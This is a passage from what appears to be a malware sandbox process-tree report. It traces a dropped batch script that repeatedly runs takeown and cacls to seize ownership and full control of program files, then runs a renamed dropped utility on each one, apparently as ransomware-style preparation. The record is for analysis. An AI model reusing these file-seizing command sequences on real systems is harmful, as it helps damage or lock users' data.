    3⤵
    PID:1268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wabmig.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1292
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:684
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Mail\WinMail.exe""
  2⤵
  - Loads dropped DLL
  PID:1812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C
    3⤵
    PID:1228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\WinMail.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "WinMail.exe" -nobanner
    3⤵
    - Loads dropped DLL
    PID:384
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "WinMail.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:1952
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:592
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Mail\wab.exe""
  2⤵
  - Loads dropped DLL
  PID:1032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:1888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wab.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "wab.exe" -nobanner
    3⤵
    - Loads dropped DLL
    PID:620
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "wab.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:1572
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1516
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""
  2⤵
  - Loads dropped DLL
  PID:1132
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1080
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:932
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1040
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:1508
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1496
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1400
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1624
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  - Loads dropped DLL
  PID:2032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    - Loads dropped DLL
    PID:436
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:684
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1060
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:1884
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:1480
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:1952
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp""
  2⤵
  PID:1748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\blank.jtp" /E /G Admin:F /C
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\blank.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "blank.jtp" -nobanner
    3⤵
    PID:916
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "blank.jtp" -nobanner
      4⤵
      PID:1572
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1032
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp""
  2⤵
  PID:1528
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" /E /G Admin:F /C
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "To_Do_List.jtp" -nobanner
    3⤵
    PID:948
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "To_Do_List.jtp" -nobanner
      4⤵
      PID:932
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""
  2⤵
  PID:1828
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C
    3⤵
    PID:1840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "cryptocme2.sig" -nobanner
    3⤵
    PID:1884
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "cryptocme2.sig" -nobanner
      4⤵
      PID:1888
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1664
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C
    3⤵
    PID:684
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"
    3⤵
    PID:1540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "license.html" -nobanner
    3⤵
    PID:620
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "license.html" -nobanner
      4⤵
      PID:320
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1384
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui""
  2⤵
  PID:1464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:112
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:1708
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      PID:908
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp""
  2⤵
  PID:1664
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp" /E /G Admin:F /C
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "Month_Calendar.jtp" -nobanner
    3⤵
    PID:580
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "Month_Calendar.jtp" -nobanner
      4⤵
      PID:1824
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1268
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1132
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:1316
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:1952
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""
  2⤵
  PID:1080
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"
    3⤵
    PID:436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "AGMGPUOptIn.ini" -nobanner
    3⤵
    PID:1528
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "AGMGPUOptIn.ini" -nobanner
      4⤵
      PID:1804
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1524
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""
  2⤵
  PID:1476
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"
    3⤵
    - Modifies file permissions
    PID:872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "eula.ini" -nobanner
    3⤵
    PID:1920
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "eula.ini" -nobanner
      4⤵
      PID:620
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1496
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""
  2⤵
  PID:112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"
    3⤵
    PID:1432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "AcroSign.prc" -nobanner
    3⤵
    PID:932
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "AcroSign.prc" -nobanner
      4⤵
      PID:908
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1508
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\Journal.exe""
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Journal.exe" /E /G Admin:F /C
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Journal.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "Journal.exe" -nobanner
    3⤵
    PID:952
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "Journal.exe" -nobanner
      4⤵
      PID:1540
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp""
  2⤵
  PID:1132
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Seyes.jtp" /E /G Admin:F /C
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Seyes.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "Seyes.jtp" -nobanner
    3⤵
    PID:1836
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "Seyes.jtp" -nobanner
      4⤵
      PID:1840
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:684
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1892
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""
  2⤵
  PID:1540
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"
    3⤵
    - Modifies file permissions
    PID:1272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "AUMProduct.cer" -nobanner
    3⤵
    PID:1920
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "AUMProduct.cer" -nobanner
      4⤵
      PID:1516
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2032
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""
  2⤵
  PID:1400
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"
    3⤵
    PID:1132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "LogTransport2.exe" -nobanner
    3⤵
    PID:820
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "LogTransport2.exe" -nobanner
      4⤵
      PID:1892
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""
  2⤵
  PID:1464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C
    3⤵
    PID:620
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "adobepdf.xdc" -nobanner
    3⤵
    PID:1812
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "adobepdf.xdc" -nobanner
      4⤵
      PID:1496
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""
  2⤵
  PID:2032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C
    3⤵
    PID:1432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"
    3⤵
    PID:324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "email_all.gif" -nobanner
    3⤵
    PID:1928
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "email_all.gif" -nobanner
      4⤵
      PID:1276
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1132
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""
  2⤵
  PID:1520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"
    3⤵
    - Modifies file permissions
    PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "MyriadCAD.otf" -nobanner
    3⤵
    PID:940
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "MyriadCAD.otf" -nobanner
      4⤵
      PID:820
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1032
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""
  2⤵
  PID:908
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "create_form.gif" -nobanner
    3⤵
    PID:1752
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "create_form.gif" -nobanner
      4⤵
      PID:1824
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""
  2⤵
  PID:1528
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C
    3⤵
    PID:1432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "open_original_form.gif" -nobanner
    3⤵
    PID:1804
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "open_original_form.gif" -nobanner
      4⤵
      PID:1232
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""
